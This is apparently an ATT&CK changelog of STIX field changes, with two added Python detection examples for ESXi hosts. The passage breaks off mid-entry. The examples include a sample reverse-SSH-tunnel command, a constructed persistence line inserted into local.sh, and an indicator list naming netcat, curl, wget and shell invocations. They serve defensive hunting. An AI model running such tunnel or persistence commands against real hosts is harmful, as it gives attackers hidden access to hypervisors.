x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-20 22:25:55.331000+00:00 | 2025-04-15 19:59:10.291000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1564.010] Hide Artifacts: Process Argument Spoofing
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-11-29 15:56:50.370000+00:00 | 2025-04-15 19:59:25.123000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1057] Process Discovery
Current version: 1.6
Version changed from: 1.5 → 1.6
Description change (old → new): one sentence added after "Adversaries may also opt to enumerate processes via `/proc`.":
Added: "ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)"
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:43:55.369000+00:00 | 2025-04-15 19:58:50.607000+00:00 |
description | Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or `Get-Process` via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via `/proc`.
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) | Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or `Get-Process` via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) |
x_mitre_version | 1.5 | 1.6 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
external_references | | {'source_name': 'Sygnia ESXi Ransomware 2025', 'description': 'Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.', 'url': 'https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/'} |
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1055.013] Process Injection: Process Doppelgänging
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 15:43:48.848000+00:00 | 2025-04-15 19:58:40.683000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1055.012] Process Injection: Process Hollowing
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:11:45.602000+00:00 | 2025-04-15 19:58:58.724000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1055] Process Injection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:45.488000+00:00 | 2025-04-16 20:37:16.893000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1572] Protocol Tunneling
Current version: 1.1
Version changed from: 1.0 → 1.1
Description change (old → new): one citation added after "(Citation: SSH Tunneling)" in the SSH tunneling sentence:
Added: "(Citation: Sygnia Abyss Locker 2025)"
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-27 17:15:35.372000+00:00 | 2025-04-15 19:58:29.875000+00:00 |
description | Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. | Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)(Citation: Sygnia Abyss Locker 2025)
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Sygnia Abyss Locker 2025', 'description': 'Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.', 'url': 'https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/'} |
x_mitre_platforms | | ESXi |
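The Process Discovery entry above adds `ps` and `esxcli system process list` on ESXi, and the Protocol Tunneling entry above adds ESXi as a platform for SSH port forwarding. Both leave a record in the hypervisor's shell history, which makes them cheap to hunt for. The following script is an added example, not part of this changelog or of ATT&CK's STIX data: it parses ESXi `/var/log/shell.log` records and flags commands that match either technique. The log-line shape (`<timestamp> shell[<pid>]: [<user>]: <command>`) is assumed from ESXi 7.x/8.x hosts, the sample lines are constructed, and the `Hit`, `classify` and `scan` names are this example's own.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One ESXi shell.log record per line, e.g.
#   2025-01-21T10:15:32Z shell[2100123]: [root]: esxcli system process list
# The "<ts> shell[<pid>]: [<user>]: <command>" shape is assumed from ESXi 7.x/8.x
# /var/log/shell.log; adjust the regex if your build logs differently.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+shell\[(?P<pid>\d+)\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.+)$"
)

# ssh options that set up a tunnel: -R remote, -L local, -D dynamic/SOCKS,
# -w tun device. -N (no remote command) alone is not tunnelling, but a
# forwarding-only session usually carries it.
FORWARD_FLAGS = set("RLDw")


@dataclass
class Hit:
    ts: str
    user: str
    technique: str
    reason: str
    cmd: str


def _argv(cmd: str) -> List[str]:
    # Pipes and redirections come through as plain tokens; that is fine because
    # only argv[0] and ssh's option clusters are inspected.
    try:
        return shlex.split(cmd)
    except ValueError:  # unbalanced quotes in the logged command
        return cmd.split()


def classify(cmd: str) -> Optional[Tuple[str, str]]:
    """Return (technique_id, reason) for a shell command, or None if not of interest."""
    argv = _argv(cmd)
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]  # tolerate /bin/ps, /usr/bin/ssh, ...

    # T1057 Process Discovery on ESXi: `ps` or `esxcli system process list`
    if prog == "ps":
        return ("T1057", "ps invoked on hypervisor")
    if prog == "esxcli" and argv[1:4] == ["system", "process", "list"]:
        return ("T1057", "esxcli system process list")

    # T1572 Protocol Tunneling: ssh with a port-forwarding option. Short options
    # may be clustered (-fNR), so every letter of each "-xyz" cluster is checked.
    if prog == "ssh":
        flags = set()
        for arg in argv[1:]:
            if arg.startswith("-") and not arg.startswith("--"):
                cluster = re.match(r"-([A-Za-z]+)", arg)
                if cluster:
                    flags.update(cluster.group(1))
        fwd = sorted(flags & FORWARD_FLAGS)
        if fwd:
            note = "ssh port forwarding (-" + "".join(fwd) + ")"
            if "N" in flags:
                note += ", no remote command (-N): forwarding-only session"
            return ("T1572", note)
    return None


def scan(log_text: str) -> List[Hit]:
    """Parse shell.log text and return one Hit per command that matches a technique."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a shell.log command record
        verdict = classify(m["cmd"])
        if verdict:
            hits.append(Hit(m["ts"], m["user"], verdict[0], verdict[1], m["cmd"]))
    return hits


# Constructed sample log for this example; not a real capture.
SAMPLE_LOG = """\
2025-01-21T10:15:32Z shell[2100123]: [root]: esxcli system process list
2025-01-21T10:15:40Z shell[2100123]: [root]: ps -c | grep vmx
2025-01-21T10:16:02Z shell[2100123]: [root]: ssh -fN -R 127.0.0.1:2222:127.0.0.1:22 ops@198.51.100.7
2025-01-21T10:16:30Z shell[2100123]: [root]: ls /vmfs/volumes
2025-01-21T10:17:01Z shell[2100123]: [root]: ssh -p 2222 admin@10.0.0.5 uptime
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.ts} {h.user} {h.technique}: {h.reason} :: {h.cmd}")
```

Run it over a pulled log with `scan(open(path).read())`. Treat hits as triage leads rather than alerts: administrators run `ps` legitimately, and a plain `ssh host command` with no `-R`, `-L`, `-D` or `-w` option is deliberately left alone, while a reverse forward (`-R`) from a hypervisor to an external address is the pattern worth an immediate look.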
[T1001.003] Data Obfuscation: Protocol or Service Impersonation
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-10-09 15:40:19.436000+00:00 | 2025-04-15 19:59:05.377000+00:00 |
x_mitre_version | 2.0 | 2.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1090] Proxy
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-30 19:16:11.648000+00:00 | 2025-04-15 19:58:41.686000+00:00 |
x_mitre_version | 3.1 | 3.2 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1055.008] Process Injection: Ptrace System Calls
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 12:26:31.766000+00:00 | 2025-04-15 19:59:18.215000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1216.001] System Script Proxy Execution: PubPrn
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-18 14:55:35.817000+00:00 | 2025-04-16 20:37:14.984000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
[T1071.005] Application Layer Protocol: Publish/Subscribe Protocols
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-16 13:08:35.629000+00:00 | 2025-04-15 19:58:14.152000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[3] | Network | Network Devices |
[T1059.006] Command and Scripting Interpreter: Python
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
x_mitre_system_requirements | ['Python is installed.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-30 18:35:58.021000+00:00 | 2025-04-15 19:59:08.245000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1037.004] Boot or Logon Initialization Scripts: RC Scripts
Current version: 2.2
Version changed from: 2.1 → 2.2
Description change (old → new):
Changed: "RC scripts which are executed" → "RC scripts, which are executed"
Changed: "Adversaries can establish persistence" → "Adversaries may establish persistence"
Changed: "such as IoT or embedded systems" → "such as ESXi hypervisors, IoT, or embedded systems"
Added (after the intezer-kaiji-malware citation): "As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)"
Changed: stray space removed before "(Citation: Apple Developer Doco Archive Launchd)"
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:22:29.150000+00:00 | 2025-04-15 19:59:13.566000+00:00 |
description | Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to `rc.local`, `rc.common`, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) | Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries may establish persistence by adding a malicious binary path or shell commands to `rc.local`, `rc.common`, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems.(Citation: intezer-kaiji-malware) As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004).(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Juniper Networks ESXi Backdoor 2022', 'description': 'Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025.', 'url': 'https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers'} |
x_mitre_platforms | | ESXi |
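The RC Scripts entry above names `/etc/rc.local.d/local.sh` as one of the few places where a change survives an ESXi reboot, which also makes it one of the few files worth auditing on every host. As an added example that is not part of this changelog or of ATT&CK's data, the following Python audits a copy of that file against its stock shape (a shebang, comment lines, and a closing `exit 0`) and reports every other executable line together with any indicator tokens it contains. The stock content in `STOCK_LOCAL_SH` is an approximation written for this example, the tampered copy is constructed, and the indicator list and the `audit_local_sh`, `Finding` and `Report` names are this example's own choices.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Tokens that rarely belong in a hypervisor boot script and often appear in
# backdoor one-liners. Supporting evidence only; the deviation itself is the finding.
INDICATORS = (
    "python", "base64", "nohup", "setsid", "nc ", "ncat", "/bin/sh", "sh -c",
    "ssh", "curl", "wget", "chmod", "esxcli system settings", "/store/", "/scratch/",
)


@dataclass
class Finding:
    line_no: int
    text: str
    indicators: List[str] = field(default_factory=list)


@dataclass
class Report:
    deviations: List[Finding]
    has_exit: bool     # a bare `exit 0` is still present
    shebang_ok: bool   # first line still starts with #!/bin/sh

    @property
    def clean(self) -> bool:
        return not self.deviations and self.has_exit and self.shebang_ok


def audit_local_sh(script: str) -> Report:
    """Flag every executable line of a local.sh that is not part of the stock file.

    Stock shape assumed here: a #!/bin/sh shebang, comment lines, blank lines and
    one `exit 0`. Anything else executes as root at boot and is reported.
    """
    lines = script.splitlines()
    shebang_ok = bool(lines) and lines[0].startswith("#!/bin/sh")
    has_exit = False
    deviations: List[Finding] = []
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank, comment, or the shebang itself
        if re.fullmatch(r"exit\s+0", line):
            has_exit = True
            continue
        hits = [tok for tok in INDICATORS if tok in line]
        deviations.append(Finding(n, raw, hits))
    return Report(deviations, has_exit, shebang_ok)


# Approximation of the file as shipped with ESXi, written for this example.
STOCK_LOCAL_SH = """\
#!/bin/sh ++group=host/vim/vmvisor/boot

# local configuration options

# Note: modify at your own risk!  If you do/use this, please do not complain
#       to VMware if it breaks.

exit 0
"""

# Constructed tampered copy: one launcher line inserted ahead of `exit 0`.
TAMPERED_LOCAL_SH = STOCK_LOCAL_SH.replace(
    "\nexit 0\n",
    "\n/bin/nohup /bin/python -u /store/packages/vmtools.py >/dev/null 2>&1 &\nexit 0\n",
)

if __name__ == "__main__":
    for name, body in (("stock", STOCK_LOCAL_SH), ("tampered", TAMPERED_LOCAL_SH)):
        report = audit_local_sh(body)
        print(f"{name}: clean={report.clean} exit0={report.has_exit}")
        for d in report.deviations:
            print(f"  line {d.line_no}: {d.text.strip()}  indicators={d.indicators}")
```

Any deviation deserves a look, but baseline against your own golden copy first: local.sh is also where administrators legitimately add boot-time customizations. Two caveats follow from how ESXi works. The copy in `/etc` is restored from the saved state on the bootbank at boot, so compare the persisted copy with the running one rather than trusting either alone. And on hosts with UEFI Secure Boot enabled, ESXi does not execute local.sh at all, so a modification there is evidence of tampering rather than of working persistence.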
[T1542.004] Pre-OS Boot: ROMMONkit
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-22 02:18:19.568000+00:00 | 2025-04-15 19:58:55.910000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1547.007] Boot or Logon Autostart Execution: Re-opened Applications
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 23:46:56.443000+00:00 | 2025-04-16 20:37:22.343000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1600.001] Weaken Encryption: Reduce Key Space
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-21 22:36:22.369000+00:00 | 2025-04-15 19:58:23.689000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1620] Reflective Code Loading
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-09 18:49:08.428000+00:00 | 2025-04-15 19:58:27.959000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:27:58.051000+00:00 | 2025-04-15 19:58:54.099000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1218.009] System Binary Proxy Execution: Regsvcs/Regasm
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-11 18:55:48.725000+00:00 | 2025-04-15 19:59:05.911000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1218.010] System Binary Proxy Execution: Regsvr32
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Anti-virus', 'Application control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21 12:24:56.148000+00:00 | 2025-04-16 20:37:19.846000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.1 | 2.2 |
[T1070.010] Indicator Removal: Relocate Malware
Current version: 1.1
Version changed from: 1.0 → 1.1
Description change (old → new): one technique name updated in the masquerading example; the rest of the text is unchanged.
Changed: "[Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)" → "[Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)"
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-13 15:48:46.391000+00:00 | 2025-04-15 19:59:08.329000+00:00 |
description | Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders. | Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[3] | Network | Network Devices |
[T1074.002] Data Staged: Remote Data Staging
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-09-30 13:28:37.414000+00:00 | 2025-04-15 19:58:21.613000+00:00 |
external_references[1]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1021.001] Remote Services: Remote Desktop Protocol
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_system_requirements | ['RDP service enabled, account in the Remote Desktop Users group'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-08-07 14:23:30.265000+00:00 | 2025-04-15 19:59:18.689000+00:00 |
external_references[1]['description'] | Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014. | Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 17, 2024. |
external_references[1]['url'] | http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/ | https://web.archive.org/web/20191115195333/https://www.crowdstrike.com/blog/adversary-tricks-crowdstrike-treats/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1021] Remote Services
Current version: 1.6
Version changed from: 1.5 → 1.6
Description (old):
